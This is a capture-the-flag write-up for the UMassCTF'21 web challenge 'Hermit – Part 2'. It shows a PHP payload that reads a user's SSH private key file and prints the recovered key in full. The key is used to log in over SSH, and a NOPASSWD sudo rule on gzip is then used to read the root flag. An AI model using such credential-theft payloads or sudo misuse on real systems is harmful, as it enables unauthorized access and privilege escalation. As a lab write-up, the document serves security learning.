UMassCTF'21: Hermit - Part 2

Hermit - Part 2

Category: web

307 points

Who are you? How did you get here? You better zip on out of here or else.

104.197.195.221:8087 34.121.84.161:8087

Created by Cobchise#6969

(The server is likely not broken. If you really think it’s broken, create a support ticket.)

Hint 1: Try enumeration

Hint 2: The port you are looking for has been forwarded to 8087.

Solution

It’s a continuation of Hermit - Part 2. Under given IP/PORT addresses there are SSH servers.

This challenge gave me the headache. Not due to its complicated, but because some of CTF participants are assholes. The solution seems to be obvious, but was not working as challenge was constantly broken by people who get the flag first. Thankfully, pnc4 wanted to check it by himself, found better moment and was able to login.

At the time I was messing around on Part 1 I have figured out there are ssh keys present in /home/hermit/.ssh/.

I’ve extracted the private part with below payload.

<?php
    $filestring = file_get_contents('/home/hermit/.ssh/id_ed25519');
    print $filestring;
?>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBJ6WTDqSNvZK2tVS8m8PojEl8gFcYdKteOlsTFa1+2UwAAAJClUMQIpVDE
CAAAAAtzc2gtZWQyNTUxOQAAACBJ6WTDqSNvZK2tVS8m8PojEl8gFcYdKteOlsTFa1+2Uw
AAAECtACFT0GlKU1unqP8hNu9C2FOx8hu89x9Mpksn3uSy7EnpZMOpI29kra1VLybw+iMS
XyAVxh0q146WxMVrX7ZTAAAADXNoaXRyaXhAbG9jYWw=
-----END OPENSSH PRIVATE KEY-----

Key can be used to login to the server on hermit user.

Linux 162d488eac13 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 29 09:15:34 2021 from 89.65.174.13
-sh: 35: set: Illegal option -o history
$ bash
[email protected]:~$ ls 
flag
[email protected]:~$ cd flag
[email protected]:~/flag$ ls
userflag.txt
[email protected]:~/flag$ cat userflag.txt 
UMASS{a_picture_paints_a_thousand_shells}

Hey, we know that flag already. Keep looking…

[email protected]:~/flag$ sudo -l
Matching Defaults entries for hermit on 162d488eac13:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hermit may run the following commands on 162d488eac13:
    (ALL : ALL) ALL
    (root) NOPASSWD: /bin/gzip -f /root/rootflag.txt -t
[email protected]:~/flag$ sudo /bin/gzip -f /root/rootflag.txt -t
UMASS{a_test_of_integrity}

Flag

UMASS{a_test_of_integrity}

Privacy Policy
luc © 2021